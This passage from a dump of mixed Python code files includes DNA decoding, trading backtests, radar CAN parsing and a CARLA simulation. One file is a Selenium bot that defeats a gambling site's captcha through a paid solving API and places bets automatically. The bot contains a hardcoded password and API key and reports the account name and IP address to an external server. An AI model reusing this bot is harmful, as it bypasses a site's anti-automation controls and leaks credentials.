defaultdict\n\n\nclass Glass:\n def __init__(self, num_chunks, out, header_size=4,\n rs=0, c_dist=0.1, delta=0.5,\n flag_correct=True, gc=0.05, max_homopolymer=3,\n max_hamming=100, decode=True, chunk_size=20, exDNA=False, np=False, truth=None):\n\n self.entries = []\n self.droplets = set()\n self.num_chunks = num_chunks\n self.chunks = [None] * num_chunks\n self.header_size = header_size\n self.decode = decode\n self.chunk_size = chunk_size\n self.exDNA = exDNA\n self.np = np\n self.chunk_to_droplets = defaultdict(set)\n self.done_segments = set()\n self.truth = truth\n self.out = out\n self.max_hamming = max_hamming\n\n self.PRNG = PRNG(K=self.num_chunks, delta=delta, c=c_dist, np=np)\n\n self.rs = rs\n self.RSCodec = None\n self.correct = flag_correct\n self.seen_seeds = set()\n\n self.debug_droplets = []\n if self.rs > 0:\n self.RSCodec = RSCodec(rs)\n\n def add_dna(self, dna_string):\n # header_size is in bytes\n\n # data = dna_to_byte(dna_string)\n\n data = dna_to_byte(dna_string)\n\n if self.rs > 0:\n # there is an error correcting code\n if self.correct: # we want to evaluate the error correcting code\n try:\n data_corrected = list(self.RSCodec.decode(data))\n except:\n logging.debug('can not correct ori data')\n return -1, None # could not correct the code\n\n # we will encode the data again to evaluate the correctness of the decoding\n data_again = list(self.RSCodec.encode(data_corrected)) # list is to convert byte array to int\n\n if np.count_nonzero(data != list(\n data_again)) > self.max_hamming: # measuring hamming distance between raw input and expected raw input\n # too many errors to correct in decoding\n logging.debug('too many errors!')\n logging.info('rs died')\n return -1, None\n\n else: # we don't want to evaluate the error correcting code (e.g. speed)\n data_corrected = data[0:len(data) - self.rs] # just parse out the error correcting part\n\n else:\n data_corrected = data\n\n seed_array = data_corrected[:self.header_size]\n seed = sum([int(x) * 256 ** i for i, x in enumerate(seed_array[::-1])])\n payload = data_corrected[self.header_size:]\n\n self.add_seed(seed)\n\n if self.decode:\n self.PRNG.set_seed(seed)\n blockseed, d, ix_samples = self.PRNG.get_src_blocks_wrap()\n d = Droplet(payload, seed, ix_samples)\n self.addDroplet(d)\n self.debug_droplets.append(deepcopy(d))\n\n return seed, data\n\n def addDroplet(self, droplet):\n\n self.droplets.add(droplet)\n for chunk_num in droplet.num_chunks:\n self.chunk_to_droplets[chunk_num].add(droplet) # we document for each chunk all connected droplets\n # logging.debug(''.join(map(chr,droplet.data)))\n self.updateEntry(droplet) # one round of message passing\n\n def updateEntry(self, droplet):\n\n # removing solved segments from droplets\n for chunk_num in (droplet.num_chunks & self.done_segments):\n droplet.data = xor(droplet.data, self.chunks[chunk_num])\n # subtract (ie. xor) the value of the solved segment from the droplet.\n droplet.num_chunks.remove(chunk_num)\n # cut the edge between droplet and input segment.\n self.chunk_to_droplets[chunk_num].discard(droplet)\n # cut the edge between the input segment to the droplet\n # solving segments when the droplet have exactly 1 segment\n if len(droplet.num_chunks) == 1: # the droplet has only one input segment\n lone_chunk = droplet.num_chunks.pop()\n\n # logging.info(\"\\nlone chunk appear: index %d\",lone_chunk)\n # logging.info(''.join(map(chr,droplet.data)))\n\n self.chunks[lone_chunk] = droplet.data # assign the droplet value to the input segment (=entry[0][0])\n # print(self.chunks)\n self.done_segments.add(lone_chunk) # add the lone_chunk to a data structure of done segments.\n if self.truth:\n self.check_truth(droplet, lone_chunk)\n self.droplets.discard(droplet) # cut the edge between the droplet and input segment\n self.chunk_to_droplets[lone_chunk].discard(\n droplet) # cut the edge between the input segment and the droplet\n\n # update other droplets\n for other_droplet in self.chunk_to_droplets[lone_chunk].copy():\n self.updateEntry(other_droplet)\n\n def String(self):\n # return ''.join(x or ' _ ' for x in self.chunks)\n res = ''\n for x in self.chunks:\n res += ''.join(map(chr, x))\n return res\n\n def StringNoPadding(self):\n return self.String().rstrip('\\0')\n\n def removePadding(self):\n crp = []\n for b in self.chunks[-1]:\n if 0 == b:\n break\n crp.append(b)\n self.chunks[-1] = crp\n return crp\n\n def Save(self, file_name):\n self.removePadding()\n with open(file_name, 'wb') as f:\n for c in self.chunks:\n f.write(bytes(c))\n logging.info('saved')\n f.close()\n\n def reDNA(self):\n self.removePadding()\n dna = byte_to_dna(self.binString())\n return dna\n\n def binString(self):\n bs = b''\n for c in self.chunks:\n bs += bytes(c)\n return bs\n\n def print_chunks(self):\n print(self.chunks)\n\n def display_chunks(self):\n i = 0\n not_none = []\n for x in self.chunks:\n print(i, ''.join(map(chr, x)))\n i += 1\n if x != None:\n not_none.append(i)\n return not_none\n\n def check_truth(self, droplet, chunk_num):\n try:\n truth_data = self.truth[chunk_num]\n except:\n print(\"Error. chunk:\", chunk_num, \" does not exist.\")\n quit(1)\n\n if not droplet.data == truth_data:\n # error\n print(\"Decoding error in \", chunk_num, \".\\nInput is:\", truth_data, \"\\nOutput is:\", droplet.data, \"\\nDNA:\",\n droplet.to_human_readable_DNA(flag_exDNA=False))\n quit(1)\n else:\n # print chunk_num, \" is OK. \", self.chunksDone, \" are done\"\n return 1\n\n def add_seed(self, seed):\n self.seen_seeds.add(seed)\n\n def len_seen_seed(self):\n return len(self.seen_seeds)\n\n def isDone(self):\n if self.num_chunks - len(self.done_segments) > 0:\n return None\n return True\n\n def chunksDone(self):\n return len(self.done_segments)\n\n def seed_test(self, seed):\n self.PRNG.set_seed(seed)\n blockseed, d, ix_samples = self.PRNG.get_src_blocks_wrap()\n print(ix_samples)\n\n\ndef FT_decode(in_file_name): # /**/\n # @title decode\n process = 0\n logging.getLogger().setLevel(logging.INFO)\n f = open(in_file_name, 'r')\n json_para = f.readline()\n dic = json.loads(json_para)\n chunk_num = dic['Chunk Nums']\n chunk_size = dic['Chunk Size']\n rs = dic['rs']\n\n g = Glass(chunk_num, '', rs=rs)\n line = 0\n errors = 0\n solve_num = []\n seen_seeds = defaultdict(int)\n\n while True:\n # read one dna in dna\n try:\n dna = f.readline().rstrip('\\n')\n except:\n logging.info(\"After reading %d lines, %d chunks are done. So far: %d rejections (%f) %d barcodes\", line,\n g.chunksDone(), errors, errors / (line + 0.0), g.len_seen_seed())\n logging.info(\"Finished reading input file!\")\n return -1\n if len(dna) == 0:\n logging.info(\"Finished reading input file!\")\n return -1\n\n line += 1\n seed, data = g.add_dna(dna)\n\n if seed == -1: # reed-solomon error!\n errors += 1\n print('rs error at', line)\n else:\n seen_seeds[seed] += 1\n\n if line % 10 == 0:\n logging.info(\"After reading %d lines, %d chunks are done. So far: %d rejections (%f) %d barcodes\", line,\n g.chunksDone(), errors, errors / (line + 0.0), g.len_seen_seed())\n process = int(100 * g.chunksDone() / chunk_num)\n print(process)\n pass\n solve_num.append(g.chunksDone())\n\n if g.isDone():\n logging.info(\"After reading %d lines, %d chunks are done. So far: %d rejections (%f) %d barcodes\", line,\n g.chunksDone(), errors, errors / (line + 0.0), g.len_seen_seed())\n logging.info(\"Done!\")\n f.close()\n return g, solve_num, True\n return g, solve_num, False\n","sub_path":"igem/BackEnd/FT_class.py","file_name":"FT_class.py","file_ext":"py","file_size_in_byte":16823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510991617","text":"def data1(m,x):\n lenth=len(x)\n res=0\n for i in range(lenth):\n res+=int(list1.index(x[i]))*m**(lenth-1-i)\n return res\nlist1=['0','1','2','3','4','5','6','7','8','9',\n 'A','B','C','D','E','F',\n 'G','H','I','J','K','L',\n 'M','N','O','P','Q','R',\n 'S','T','U','V','W','X',\n 'Y','Z']\n\n\ndef root(x , y , k) :\n temp = 1\n while y :\n # 相当于y%2\n if y & 1 == 1 : # 当是奇数时\n temp = (temp * x) % k\n x = (x * x) % k\n y = y >> 1\n temp = temp if temp else k\n return temp\n\n\nif __name__ == '__main__' :\n while True :\n try :\n x , y , k = map(int , input().strip().split())\n print(root(x , y , k - 1))\n\n except :\n break","sub_path":"小样/进制转换.py","file_name":"进制转换.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"78696506","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom typing import List\n\nimport pandas as pd\n\nfrom zvt.domain import SecurityType, TradingLevel\nfrom zvt.selectors.selector import TargetSelector\nfrom zvt.trader import TradingSignal, TradingSignalType\nfrom zvt.trader.account import SimAccountService\nfrom zvt.utils.time_utils import to_pd_timestamp\n\n\nclass SelectorsComparator(object):\n\n def __init__(self, limit=10) -> None:\n self.selectors: List[TargetSelector] = []\n self.limit = limit\n\n def add_selector(self, selector):\n \"\"\"\n\n :param selector:\n :type selector: TargetSelector\n \"\"\"\n self.selectors.append(selector)\n\n def add_selectors(self, selectors):\n \"\"\"\n\n :param selectors:\n :type selectors: List[TargetSelector]\n \"\"\"\n self.selectors += selectors\n\n def make_decision(self, timestamp):\n df = pd.DataFrame()\n for selector in self.selectors:\n df = df.append(selector.get_targets(timestamp))\n if not df.empty:\n df = df.sort_values(by=['security_id', 'score'])\n if len(df.index) > self.limit:\n df = df.iloc[list(range(self.limit)), :]\n return df\n\n\nclass Trader(object):\n logger = logging.getLogger(__name__)\n\n # overwrite it to custom your trader\n selectors_comparator = SelectorsComparator(limit=10)\n\n def __init__(self, security_type=SecurityType.stock, exchanges=['sh', 'sz'], codes=None,\n start_timestamp=None,\n end_timestamp=None) -> None:\n\n self.trader_name = type(self).__name__.lower()\n self.trading_signal_listeners = []\n self.state_listeners = []\n\n self.selectors: List[TargetSelector] = None\n\n self.security_type = security_type\n self.exchanges = exchanges\n self.codes = codes\n\n if start_timestamp and end_timestamp:\n self.start_timestamp = to_pd_timestamp(start_timestamp)\n self.end_timestamp = to_pd_timestamp(end_timestamp)\n else:\n assert False\n\n self.account_service = SimAccountService(trader_name=self.trader_name,\n timestamp=self.start_timestamp)\n\n self.add_trading_signal_listener(self.account_service)\n\n self.init_selectors(security_type=self.security_type, exchanges=self.exchanges, codes=self.codes,\n start_timestamp=self.start_timestamp, end_timestamp=self.end_timestamp)\n\n self.selectors_comparator.add_selectors(self.selectors)\n\n def init_selectors(self, security_type, exchanges, codes, start_timestamp, end_timestamp):\n \"\"\"\n implement this to init selectors\n\n :param security_type:\n :type security_type:\n :param exchanges:\n :type exchanges:\n :param codes:\n :type codes:\n :param start_timestamp:\n :type start_timestamp:\n :param end_timestamp:\n :type end_timestamp:\n \"\"\"\n raise NotImplementedError\n\n def add_trading_signal_listener(self, listener):\n if listener not in self.trading_signal_listeners:\n self.trading_signal_listeners.append(listener)\n\n def remove_trading_signal_listener(self, listener):\n if listener in self.trading_signal_listeners:\n self.trading_signal_listeners.remove(listener)\n\n def run(self):\n # now we just support day level\n for timestamp in pd.date_range(start=self.start_timestamp, end=self.end_timestamp,\n freq='B').tolist():\n\n self.account_service.on_trading_open(timestamp)\n\n account = self.account_service.latest_account\n current_holdings = [position['security_id'] for position in account['positions']]\n\n df = self.selectors_comparator.make_decision(timestamp=timestamp)\n\n selected = set()\n if not df.empty:\n selected = set(df['security_id'].to_list())\n\n if selected:\n # just long the security not in the positions\n longed = selected - set(current_holdings)\n if longed:\n position_pct = 1.0 / len(longed)\n order_money = account['cash'] * position_pct\n\n for security_id in longed:\n trading_signal = TradingSignal(security_id=security_id,\n the_timestamp=timestamp,\n trading_signal_type=TradingSignalType.trading_signal_open_long,\n trading_level=TradingLevel.LEVEL_1DAY,\n order_money=order_money)\n for listener in self.trading_signal_listeners:\n listener.on_trading_signal(trading_signal)\n\n shorted = set(current_holdings) - selected\n\n for security_id in shorted:\n trading_signal = TradingSignal(security_id=security_id,\n the_timestamp=timestamp,\n trading_signal_type=TradingSignalType.trading_signal_close_long,\n position_pct=1.0,\n trading_level=TradingLevel.LEVEL_1DAY)\n for listener in self.trading_signal_listeners:\n listener.on_trading_signal(trading_signal)\n\n self.account_service.on_trading_close(timestamp)\n","sub_path":"zvt/trader/trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"24557163","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nlast mod 12/3/17 wide-range mode on\n\nfunction to call: get(timeout in seconds)\noutput: list of two-element x-y tuples\n\nIf run on its own, plots detected points\n\"\"\"\nfrom multiprocessing import Process, Queue\nfrom math import cos, sin\nimport cantools\nimport prototype.sensors.canlib as canlib\n\n# the .dbc file is a translator for CAN messages\nmy_folder = __file__[:-14] if __file__[-3:]=='.py' else __file__[:-15]\ndb = cantools.db.load_file(my_folder + 'proprietary/radar_can_defs.dbc')\ninitialize_msg = db.messages[126]\ninitialize_params = initialize_msg.decode([0]*8)\ninitialize_params['CAN_RX_RADAR_CMD_RADIATE'] = 'On'\ninitialize_params['CAN_RX_MAXIMUM_TRACKS'] = 64\n# if Filtered, will delete and merge detections by Delphi's rules\n# in my experience, this results in limited accuracy\ninitialize_params['CAN_RX_RAW_DATA_ENABLE'] = 'Raw'#'Filtered'#\n# if On, only use long-and-narrow beam\ninitialize_params['CAN_RX_LR_ONLY_TRANSMIT'] = 'Off'#'On'#\n\n\n\"\"\" This is a shortened version of the code used by 2016's senior design\nteam. I imagine they got the original from Delphi or AutonomouStuff at some point.\nThe code has been shortened to only gather object location information, \nnamely range, angle, range rate (speed toward/from self) and lateral rate\"\"\"\nclass Radar(Process):\n \"\"\" Listens for new Radar messages over CAN and parses for the dispatcher.\n\n This parser reads messages from the CAN Bus using the Kvaser USB Python SKD\n and formats Radar information into a python object. Then we send the data\n along to the event dispatcher.\n \"\"\"\n def __init__(self, filename):\n Process.__init__(self)\n self.queue = Queue()\n \n self.init_params = initialize_params\n self.init_msg = initialize_msg\n cl = canlib.canlib()\n self.ch1 = cl.openChannel(0, canlib.canOPEN_ACCEPT_VIRTUAL)\n \n \n def __enter__(self):\n return self.queue\n \n def terminate(self):\n self.ch1.busOff()\n self.ch1.close()\n self.queue.close()\n super(Radar, self).terminate()\n \n def __exit__(self, errtype=None, errval=None, traceback=None):\n self.terminate()\n\n def run(self):\n print(\"Using channel: %s, EAN: %s\" % (\n self.ch1.getChannelData_Name(), self.ch1.getChannelData_EAN()))\n\n self.ch1.setBusOutputControl(canlib.canDRIVER_NORMAL)\n self.ch1.setBusParams(canlib.canBITRATE_500K)\n self.ch1.busOn()\n\n # Initialize the Radar\n self.ch1.writeWait(self.init_msg.frame_id,\n self.init_msg.encode(self.init_params), 8, 1000)\n\n points = []\n \n while True:\n msgId, msg, dlc, flg, msgtime = self.ch1.read(1000)\n\n if msgId >= 1280 and msgId <= 1343:\n output = db.decode_message(msgId, msg)\n if output['CAN_TX_TRACK_RANGE'] == 0: continue\n angle_rad = -.01745 * output['CAN_TX_TRACK_ANGLE']\n points.append((output['CAN_TX_TRACK_RANGE']*cos(angle_rad),\n output['CAN_TX_TRACK_RANGE']*sin(angle_rad)))\n \n elif msgId == 1248:\n self.queue.put(tuple(points))\n points = []\n \n\n\n\nif __name__ == '__main__':\n # plot radar points\n import numpy as np\n import cv2\n \n size = 320\n distance = 20.\n \n base_image = np.zeros((size*2, size*2, 3), dtype=np.uint8) + 255\n base_image[size-5:size+5, size-5:size+5] = [230,230,230]\n class Display():\n def __init__(self): pass\n def __enter__(self):\n cv2.imshow('lidar side detections', base_image)\n cv2.waitKey(5)\n return self\n def __exit__(self, a, b, c): cv2.destroyWindow('lidar side detections')\n def display(self, image):\n cv2.imshow('lidar side detections', image)\n cv2.waitKey(5)\n \n color = (0,0,0)\n \n offsets = ((-1,0),(1,0),(0,-1),(0,1),(0,0))\n \n with Radar() as lidar, Display() as display:\n while True:\n cloud = lidar.get()\n \n cloud = np.array(cloud)\n cloud *= -size/distance\n cloud[:,0] += size*2\n cloud[:,1] += size\n include = np.all((cloud>=0) & (cloud < size*2), axis=1)\n cloud = cloud[include].astype(int)\n img = base_image.copy()\n for offx, offy in offsets:\n img[cloud[:,0]+offx, cloud[:,1]+offy] = color\n display.display(img)\n","sub_path":"Prototype/sensors/delphiRadar.py","file_name":"delphiRadar.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"603990699","text":"from django.conf.urls import url\nfrom . import views\n \nurlpatterns = [\n url(r'^$', views.index),\n url(r'^authors$', views.auth),\n url(r'^add_book$', views.add_book),\n url(r'^books/(?P\\d+)$', views.view_book),\n url(r'^auth_book$', views.auth_to_book),\n url(r'^add_auth$', views.add_auth),\n url(r'^authors/(?P\\d+)$', views.view_author),\n url(r'^book_auth$', views.book_to_auth),\n]","sub_path":"apps/books_authors/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"79741145","text":"# encoding: utf-8\n\nfrom selenium import webdriver\nimport time\nfrom PIL import ImageGrab\nfrom chaojiying import Chaojiying_Client\nimport random\nfrom urllib import request,parse\nimport urllib.request\nimport base64\nimport json\nfrom config_data import deviceall\nimport requests\nimport re\n\nclass filter():\n sign_up = 'https://890cp2.com'\n\n def setUp(self):\n self.device = deviceall[5] #deviceall[4]\n print(self.device)\n pixel_ratio = 3.0\n mobileEmulation = {\"deviceMetrics\": {\"width\": self.device['width'], \"height\": self.device['height'], \"pixelRatio\": pixel_ratio},\"userAgent\": self.device['ua']}\n options = webdriver.ChromeOptions()\n # options.binary_location = \"C:/Users/moxi/Desktop/mychrome/Chrome/chrome.exe\"\n # chrome_driver_binary = \"chromedriver.exe\"\n options.binary_location = \"C:/Program Files (x86)/Google\\Chrome/Application/chrome.exe\" # C:/Users/moxi/Desktop/mychrome/Chrome/chrome.exe\n chrome_driver_binary = \"chromedriver76.exe\" # chromedriver.exe\n options.add_experimental_option('mobileEmulation', mobileEmulation)\n # self.driver = webdriver.Chrome(executable_path='chromedriver.exe', chrome_options=options)\n self.driver = webdriver.Chrome(chrome_driver_binary, options=options)\n self.driver.maximize_window()\n time.sleep(1)\n self.driver.get(self.sign_up)\n self.driver.implicitly_wait(30)\n\n\n def quit(self):\n self.driver.quit()\n\n def verify(self):\n\n # self.driver.find_element_by_class_name(\"popupNotice_closeBtn___bVSp8\").click()\n self.driver.find_element_by_xpath('//button[@class=\"popupNotice_closeBtn___bVSp8\"]').click()\n for i in range(1,3) :\n self.driver.refresh()\n time.sleep(5)\n self.driver.find_element_by_xpath('//button[@type=\"submit\"]').click()\n # self.driver.find_element_by_class_name(\"barTextButton___G3WVC\").click()\n self.driver.switch_to.frame(self.driver.find_element_by_xpath(\"//iframe[contains(@src,'/login')]\"))\n\n username =\"bq09221\"\n pwd = \"HWIsMRCrbl\"\n print(\"User:\"+username)\n print(\"Pwd:\"+pwd)\n\n time.sleep(1)\n\n # user = self.driver.find_element_by_xpath('//input[@id=\"username\"]')\n user = self.driver.find_element_by_id(\"username\")\n user.clear()\n user.send_keys(username)\n # passw = self.driver.find_element_by_xpath('//input[@id=\"password\"]')\n passw = self.driver.find_element_by_find_id(\"password\")\n passw.send_keys(pwd)\n # code = self.driver.find_element_by_xpath('//input[@id=\"validateCode\"]')\n code = self.driver.find_element_by_id(\"validateCode\")\n code.send_keys(\"\")\n\n time.sleep(1)\n\n x = self.device['xy']['x'] # 1872\n y = self.device['xy']['y'] # 688,438\n w = x + 205 # 275,230\n h = y + 40 # 50,38\n size = (x, y, w, h)\n img = ImageGrab.grab(size)\n img.save(\"C:/Users/moxi/Downloads/1.png\") # /Users/iwtay/Downloads/images/1.png\n # img.show()\n\n time.sleep(1)\n\n # chaojiying = Chaojiying_Client('iwtay77', 'Iwt.ay77','ac212bb67ed8fce6a530514d9f478093') # 用户中心>>软件ID 生成一个替换 96001\n # im = open('/Users/iwtay/Downloads/images/1.png', 'rb').read() # 本地图片文件路径 来替换 a.jpg 有时WIN系统须要//\n # yzm = chaojiying.PostPic(im, 1902)\n # print(yzm)\n # time.sleep(5)\n\n appkey = \"62a8949082d27515eeafbd101b64912a\"\n with open(\"C:/Users/moxi/Downloads/1.png\", 'rb') as f:\n base64_data = base64.b64encode(f.read())\n s = base64_data.decode()\n # print(s)\n\n textmob = {\n \"key\": appkey,\n \"codeType\": 4006,\n \"base64Str\": s\n }\n textmob = parse.urlencode(textmob).encode(encoding='utf-8')\n # print(textmob)\n\n req = urllib.request.Request(url=\"http://op.juhe.cn/vercode/index\", data=textmob)\n webpage = urllib.request.urlopen(req)\n html = webpage.read()\n res = json.loads(html)\n yzm = str(res[\"result\"])\n print(yzm)\n\n code.send_keys(yzm)\n time.sleep(1)\n self.driver.find_element_by_xpath('//button[@id=\"submit\"]').click()\n print(i)\n if i == 1 :\n time.sleep(2)\n quit = self.driver.find_elements_by_xpath('//button[@class=\"quickAccessBarBtn___1F1-B\"]')[7]\n quit.click()\n time.sleep(1)\n sure = self.driver.find_element_by_class_name(\"ant-btn.ant-btn-primary\")\n if sure:\n sure.click()\n time.sleep(5)\n else:\n break\n\n time.sleep(2)\n\n sideNav_list = self.driver.find_elements_by_xpath('//button[@class=\"sideNav_anchor___1D7s9\"]')\n sideNav =random.choice(sideNav_list)\n sideNav.click()\n\n rand = self.driver.find_elements_by_class_name(\"gameCal_ctrlBtn___38COx\")[2]\n add = self.driver.find_elements_by_class_name(\"theme1___341L1.undefined button___3xxsI\")[1]\n\n rand.click()\n add.click()\n\n rand.click()\n add.click()\n\n rand.click()\n add.click()\n\n rand.click()\n add.click()\n\n rand.click()\n add.click()\n\n self.driver.find_element_by_xpath('//button[@data-position=\"bottom\"]').click()\n time.sleep(3)\n\n url = \"http://200019.ip138.com/\"\n req = urllib.request.urlopen(url).read()\n print(req)\n theIP = re.findall(r\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}.\\d{1,3}\", str(req))\n ip = theIP[0]\n print(\"your IP Address is: \", ip)\n\n time.sleep(5)\n\n betss = self.driver.find_element_by_xpath('//div[@class=\"gameCart_response___T0czT\"]').text\n if betss == \"投注成功祝您中奖\":\n print(\"投注成功祝您中奖!\")\n response = requests.post(\n f\"http://47.75.184.28/api/imessage-server/imessage-restapi/external/markEmail?email={username}&ip={ip}\")\n print(response.status_code)\n\n time.sleep(3)\n\n\n\nif __name__ == \"__main__\":\n F = filter()\n F.setUp()\n F.verify()\n F.quit()\n\n\n","sub_path":"978Wplay.py","file_name":"978Wplay.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"430524414","text":"import operator\n\ndef f(n):\n return reduce(operator.mul, range(1,n+1),1)\n\nl = []\nfor _ in range(input()):\n x = input()\n sinof_x = x - (x**3/f(3)) + (x**5/f(5)) - (x**7/f(7)) + (x**9/f(9))\n l.append(sinof_x)\n cosof_x = 1 - (x**2/f(2)) + (x**4/f(4)) - (x**6/f(6)) + (x**8/f(8))\n l.append(cosof_x)\n\nfor e in l:\n print(\"%.3f\"%e)\n","sub_path":"trignometrics_ratio.py","file_name":"trignometrics_ratio.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"379355828","text":"import argparse\nimport carla\nimport cv2\nimport logging\nimport carla\nfrom carla import ColorConverter as cc\nimport numpy as np\nimport time\nimport datetime\nimport weakref\nimport math\nimport os\nimport sys\nimport glob\nimport random\nimport pygame\nimport pandas as pd\nfrom PIL import Image\nfrom queue import Queue\nfrom queue import Empty\n\nimport carla_vehicle_annotator as cva\n\n\ndef parser():\n argparser = argparse.ArgumentParser(\n description=__doc__)\n argparser.add_argument(\n '--host',\n metavar='H',\n default='127.0.0.1',\n help='IP of the host server (default: 127.0.0.1)')\n argparser.add_argument(\n '-p', '--port',\n metavar='P',\n default=2000,\n type=int,\n help='TCP port to listen to (default: 2000)')\n argparser.add_argument(\n '-n', '--number-of-vehicles',\n metavar='N',\n default=300,\n type=int,\n help='number of vehicles (default: 30)')\n argparser.add_argument(\n '-d', '--number-of-dangerous-vehicles',\n metavar='N',\n default=1,\n type=int,\n help='number of dangerous vehicles (default: 3)')\n argparser.add_argument(\n '--tm-port',\n metavar='P',\n default=8000,\n type=int,\n help='port to communicate with TM (default: 8000)')\n argparser.add_argument(\n '--sync',\n action='store_true',\n default=True,\n help='Synchronous mode execution')\n\n return argparser.parse_args()\n\n\ndef sensor_callback(sensor_data, sensor_queue, sensor_name, world):\n if 'radar' in sensor_name:\n points = np.frombuffer(sensor_data.raw_data,dtype=np.dtype('f4'))\n points = np.reshape(points, (-1, 4))\n # outputImgPath=\"../output/\"\n # filename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n # f2 = open(outputImgPath+filename+'.txt','a')\n # f2.write(str(points))\n current_rot = sensor_data.transform.rotation\n debug = world.debug \n lists=[]\n for detect in sensor_data:\n azi = math.degrees(detect.azimuth)\n alt = math.degrees(detect.altitude)\n if abs(detect.velocity)>0 :\n lists.append([azi,detect.depth,detect.velocity])\n # lists.append(detect.depth)\n # lists.append(detect.velocity)\n # lists = np.reshape(lists, (-1, 3))\n outputImgPath=\"./output/\"\n filename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n # data1=pd.DataFrame(list)\n # data1.to_csv(outputImgPath+filename+'.csv','w')\n f2 = open(outputImgPath+filename+'.txt','w')\n f2.write(str(lists))\n # The 0.25 adjusts a bit the distance so the dots can\n # be properly seen\n fw_vec = carla.Vector3D(x=detect.depth - 0.25)\n carla.Transform(\n carla.Location(),\n carla.Rotation(\n pitch=current_rot.pitch + alt,\n yaw=current_rot.yaw + azi,\n roll=current_rot.roll)).transform(fw_vec)\n\n def clamp(min_v, max_v, value):\n return max(min_v, min(value, max_v))\n\n norm_velocity = detect.velocity / 7.5 # range [-1, 1]\n r = int(clamp(0.0, 1.0, 1.0 - norm_velocity) * 255.0)\n g = int(clamp(0.0, 1.0, 1.0 - abs(norm_velocity)) * 255.0)\n b = int(abs(clamp(- 1.0, 0.0, - 1.0 - norm_velocity)) * 255.0)\n debug.draw_point(\n sensor_data.transform.location + fw_vec,\n size=0.075,\n life_time=0.06,\n persistent_lines=False,\n color=carla.Color(r, g, b))\n if 'camera' in sensor_name:\n array = np.frombuffer(sensor_data.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (1080, 1920, 4))\n array = array[:, :, :3]\n array = array[:, :, ::-1]\n # array = pygame.surfarray.make_surface(array.swapaxes(0, 1))\n im = Image.fromarray(array)\n outputImgPath=\"./output/\"\n filename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n im.save(outputImgPath+str(filename)+'.jpg')\n # sensor_data.save_to_disk(os.path.join('../outputs/output_synchronized', '%06d.png' % sensor_data.frame))\n sensor_queue.put((sensor_data.frame, sensor_name))\n\n\ndef main():\n args = parser()\n logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n vehicles_id_list = []\n sensor_list = []\n client = carla.Client(args.host, args.port)\n client.set_timeout(10.0)\n synchronous_master = False\n\n try: \n world = client.load_world('Town03')\n origin_settings = world.get_settings()\n traffic_manager = client.get_trafficmanager(args.tm_port)\n # every vehicle keeps a distance of 3.0 meter\n traffic_manager.set_global_distance_to_leading_vehicle(3.0)\n # Set physical mode only for cars around ego vehicle to save computation\n traffic_manager.set_synchronous_mode(True)\n # default speed is 30\n traffic_manager.global_percentage_speed_difference(-50)\n \n # Suggest using syncmode\n if args.sync:\n settings = world.get_settings()\n traffic_manager.set_synchronous_mode(True)\n if not settings.synchronous_mode:\n synchronous_master = True\n settings.synchronous_mode = True\n # 25fps\n settings.fixed_delta_seconds = 0.04\n world.apply_settings(settings)\n blueprints_vehicle = world.get_blueprint_library().filter(\"vehicle.*\")\n # sort the vehicle list by id\n blueprints_vehicle = sorted(blueprints_vehicle, key=lambda bp: bp.id)\n print (blueprints_vehicle)\n spawn_points = world.get_map().get_spawn_points()\n number_of_spawn_points = len(spawn_points)\n\n if args.number_of_vehicles < number_of_spawn_points:\n random.shuffle(spawn_points)\n elif args.number_of_vehicles >= number_of_spawn_points:\n msg = 'requested %d vehicles, but could only find %d spawn points'\n logging.warning(msg, args.number_of_vehicles, number_of_spawn_points)\n args.number_of_vehicles = number_of_spawn_points - 1\n\n # Use command to apply actions on batch of data\n SpawnActor = carla.command.SpawnActor\n SetAutopilot = carla.command.SetAutopilot\n # this is equal to int 0\n FutureActor = carla.command.FutureActor\n\n batch = []\n\n for n, transform in enumerate(spawn_points):\n if n >= args.number_of_vehicles:\n break\n\n blueprint = random.choice(blueprints_vehicle)\n\n if blueprint.has_attribute('color'):\n color = random.choice(blueprint.get_attribute('color').recommended_values)\n blueprint.set_attribute('color', color)\n if blueprint.has_attribute('driver_id'):\n driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)\n blueprint.set_attribute('driver_id', driver_id)\n\n # set autopilot\n blueprint.set_attribute('role_name', 'autopilot')\n\n # spawn the cars and set their autopilot all together\n batch.append(SpawnActor(blueprint, transform)\n .then(SetAutopilot(FutureActor, True)))\n\n # excute the command\n for (i, response) in enumerate(client.apply_batch_sync(batch, synchronous_master)):\n if response.error:\n logging.error(response.error)\n else:\n print(\"Fucture Actor\", response.actor_id)\n vehicles_id_list.append(response.actor_id)\n\n vehicles_list = world.get_actors().filter('vehicle.*')\n # wait for a tick to ensure client receives the last transform of the vehicles we have just created\n if not args.sync or not synchronous_master:\n world.wait_for_tick()\n else:\n world.tick()\n \n # set several of the cars as normal car\n for i in range(args.number_of_vehicles):\n car = vehicles_list[i]\n traffic_manager.distance_to_leading_vehicle(car, 3)\n traffic_manager.vehicle_percentage_speed_difference(car, -80)\n\n\n \n\n # set several of the cars as dangerous car\n for i in range(args.number_of_dangerous_vehicles):\n danger_car = vehicles_list[i]\n # crazy car 